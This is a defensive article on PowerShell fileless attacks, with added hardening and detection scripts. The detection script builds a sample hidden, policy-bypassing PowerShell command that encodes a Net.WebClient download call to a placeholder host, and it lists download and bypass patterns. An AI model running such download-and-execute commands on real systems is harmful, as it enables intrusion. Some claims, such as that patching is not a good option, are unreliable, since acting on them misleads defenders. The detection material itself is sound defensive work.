Understanding & Avoiding PowerShell Exploits
 
PowerShell is a built-in command-line tool that ships with Windows operating systems. It runs in memory, provides full access to system functions, and can be used to execute commands, such as downloading content that is then run on the PC. Because it is preinstalled and multipurpose, Windows PowerShell has over time become an ideal tool for cyber criminals to gain entry to a target system and then move laterally across an organization’s entire network.
PowerShell attacks are based on fileless malware; that is, the attacker does not need to get any software installed on the victim’s PC. PowerShell attacks use a tool built into the OS (Windows 7, for example) for various malicious activities. Because this sort of attack doesn’t require any new software, and techniques for tackling these forms of malware are limited, the attacks are difficult to detect as they keep growing. Some of the most dangerous attacks include PSAttackBuildTool, Offensive PowerShell, Nishang, etc. Between 2016 and ’17, PowerShell malware attacks grew by 432%, and by about 661% in 2018. And in 2019, so far, they have already accounted for 57% of the total attacks detected by IBM. These figures demonstrate how heavily attackers are trying to penetrate people’s personal space and cyberspace, which makes knowledge of this malware important for everyone.
How Does it Happen?
Fileless malware gains access to a computer when users download code or commands that are executable on their systems. Typically, it happens when people try to bypass a program such as an antivirus or paid software so that they can use it for free. The downloaded code or files get executed on the computer, thereby allowing the malware to take its place on the target. PowerShell, being a trusted Windows program, does not get flagged as a system threat by Windows Defender, nor, as a matter of fact, are the scripts running through it checked. Attackers run their scripts on a computer when someone downloads the compromised code, which gives them the access they need to get past the firewall. At other times, attackers monitor operations to gain administrative control.
A whole enterprise environment runs the risk of exploitation even when just one computer in its network is compromised. In the event of an active, interactive PowerShell session attack, cyber criminals can obtain a username and password, which paves the way for even greater abuse. Since PowerShell commands can be run from remote Windows computers, attackers can move across an organization’s network to gain access to confidential information or gain control over privileged accounts. The absence of any installed software behind the attack, and the fact that different PowerShell attack tools don't target the same location, make it difficult to detect and flush out an attacker from a system.
What can be done?
Upgrade Your PowerShell Version
Disabling updates is not the best thing to do as far as security measures are concerned; nor is patching a good option. The ideal prevention measure is to upgrade to the new and latest version, which contains improved features. Microsoft Windows PowerShell developers are doing great and the latest PowerShell version (5.X) is quite stable.
Disable Outdated Versions
After the upgrade, it is necessary to disable the previous PowerShell engine. Versions of Windows from 8 onward all have an optional feature that keeps the PowerShell V2 engine installed on the computer, and this can still allow downgrade attacks.
On versions of Windows from Windows 8 onward, you can execute the following command on your endpoint.

    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root

After this, with Invoke-Command, you can also enable ModuleLogging and ScriptBlockLogging.
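The two steps above combined into one script, added here as an example and not taken from the original article. It assumes the logging settings are enabled through their policy registry values (the article does not say how), that it runs from an elevated prompt, and $Harden is a hypothetical name.

```powershell
# Added example. The feature name is from the article; the registry values are
# the policy settings behind "Turn on PowerShell Script Block Logging" and
# "Turn on Module Logging".
$Harden = {
    $feature = 'MicrosoftWindowsPowerShellV2Root'
    $policy  = 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $dword   = [Microsoft.Win32.RegistryValueKind]::DWord

    # 1. Remove the PowerShell 2.0 engine so "-version 2" downgrades fail.
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName $feature -ErrorAction SilentlyContinue
    if ($v2 -and $v2.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName $feature -NoRestart | Out-Null
    }

    # 2. Script block logging (event ID 4104) and module logging (event ID 4103).
    #    Registry.SetValue creates the policy keys if they do not exist yet.
    [Microsoft.Win32.Registry]::SetValue("$policy\ScriptBlockLogging", 'EnableScriptBlockLogging', 1, $dword)
    [Microsoft.Win32.Registry]::SetValue("$policy\ModuleLogging", 'EnableModuleLogging', 1, $dword)
    # Log every module: a string value named * with data * under ModuleNames.
    [Microsoft.Win32.Registry]::SetValue("$policy\ModuleLogging\ModuleNames", '*', '*')

    # 3. Report the resulting state so each endpoint can be checked.
    $state = (Get-WindowsOptionalFeature -Online -FeatureName $feature -ErrorAction SilentlyContinue).State
    [pscustomobject]@{
        Computer           = $env:COMPUTERNAME
        V2Engine           = if ($state) { "$state" } else { 'NotPresent' }
        ScriptBlockLogging = [Microsoft.Win32.Registry]::GetValue("$policy\ScriptBlockLogging", 'EnableScriptBlockLogging', 0)
        ModuleLogging      = [Microsoft.Win32.Registry]::GetValue("$policy\ModuleLogging", 'EnableModuleLogging', 0)
    }
}

# Run on the local machine.
& $Harden

# For remote endpoints over PowerShell remoting, pass the same block to
# Invoke-Command (endpoint name is a placeholder):
# Invoke-Command -ComputerName <endpoint> -ScriptBlock $Harden
```

The logged events appear in the Microsoft-Windows-PowerShell/Operational event log on each endpoint.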
Detection
One of the defensive measures against PowerShell malware is to understand and detect its command lines. As stated, it can be extremely challenging to pin down the source of a PowerShell attack. However, some command-line parameters have been identified as notorious, and they include the following:
- -encoded: with the variation "-e", it allows a user to run encoded code via PowerShell.
- -ExecutionPolicy bypass: the variations "-ep bypass", "-exp bypass" and "-exec bypass" cause false positives and allow the execution policy to be bypassed.
- -noprofile: "-nop" skips loading profile.ps1, thereby preventing logging.
- -windowStyle hidden: it creates false positives while preventing a window from being shown.
- -version 2: "v2" forces the use of version 2 of PowerShell.
Modules
During intensive scans, it is also worth looking out for modules that are used to launch attacks. Common modules include Net.WebClient, .DownloadString, .DownloadFile, .Download. These modules can be monitored with enhanced module logging enabled, so that unwanted scripts can be disabled.
In conclusion, a PowerShell attack is malware that requires no new source (file or software) to operate on a PC or network. It simply uses a tool built into the Windows OS to get past the firewall and into a system. With a breached username and password, it is possible to gain access to an entire network. It can be detected and prevented by keeping PowerShell up to date and uninstalling previous versions or engines. ModuleLogging and ScriptBlockLogging, when enabled, also detect and prevent attacks. Most importantly, the use of third-party programs to bypass the security or licensing checks of important software should be avoided.
Besides this, proactive monitoring of your organization’s systems and networks for vulnerabilities or suspicious behavior can help security teams detect anomalies before the damage is done. Security analysts should incorporate Threat Intelligence into their security mechanisms to identify and prevent attacks. Adopting a robust defense strategy against these growing threats can help avoid the risk of a compromise.
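A detection sketch for the parameters and download calls listed above, added as an example and not part of the original article. It goes slightly beyond the list by accepting any abbreviated form of each parameter and by decoding the -encoded payload before searching it; the function name, rule table and sample command lines are constructed for illustration.

```powershell
# Added example. Parameter names and aliases come from the article's list;
# Min is the shortest prefix of each name this sketch treats as a match.
$Rules = @(
    @{ Name = 'EncodedCommand';  Min = 1; Alias = @('ec');        Value = $null }
    @{ Name = 'ExecutionPolicy'; Min = 2; Alias = @('ep', 'exp'); Value = '^bypass$' }
    @{ Name = 'NoProfile';       Min = 3; Alias = @();            Value = $null }
    @{ Name = 'WindowStyle';     Min = 1; Alias = @();            Value = '^hidden$' }
    @{ Name = 'Version';         Min = 1; Alias = @();            Value = '^2(\.0)?$' }
)
$DownloadPattern = 'Net\.WebClient|\.DownloadString|\.DownloadFile'

function Get-SuspiciousPowerShellFlag {
    param([Parameter(Mandatory)][string]$CommandLine)

    $tokens = $CommandLine.Trim() -split '\s+'   # simplification: ignores quoting
    $hits   = New-Object System.Collections.Generic.List[string]
    $text   = $CommandLine
    for ($i = 0; $i -lt $tokens.Count; $i++) {
        if ($tokens[$i] -match '^[-/](.+)$') { $flag = $Matches[1].ToLower() } else { continue }
        $next = if ($i + 1 -lt $tokens.Count) { $tokens[$i + 1] -replace '^["'']+|["'']+$', '' } else { '' }
        foreach ($r in $Rules) {
            $isPrefix = $flag.Length -ge $r.Min -and $r.Name.ToLower().StartsWith($flag)
            if (-not ($isPrefix -or $r.Alias -contains $flag)) { continue }
            if ($r.Value -and $next -notmatch $r.Value) { continue }
            $hits.Add($r.Name)
            if ($r.Name -eq 'EncodedCommand') {
                # -EncodedCommand carries Base64 of UTF-16LE text; decode it so the
                # download patterns are searched in the real script as well.
                try { $text += ' ' + [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($next)) } catch {}
            }
        }
    }
    if ($text -match $DownloadPattern) { $hits.Add('DownloadCall') }
    [pscustomobject]@{ Score = $hits.Count; Hits = $hits -join ','; CommandLine = $CommandLine }
}

# Constructed sample command lines, shaped like process-creation log entries.
$script  = "(New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
$samples = @(
    'powershell.exe -File C:\Scripts\Backup.ps1'
    "powershell.exe -nop -w hidden -ep bypass -e $encoded"
    'powershell.exe -Version 2 -NoProfile -Command Get-Process'
)
$samples | ForEach-Object { Get-SuspiciousPowerShellFlag $_ } |
    Sort-Object Score -Descending | Format-List
```

Treat the score as a triage signal: legitimate management tooling also uses -NoProfile and -ExecutionPolicy, so alerting on combinations is less noisy than alerting on any single flag.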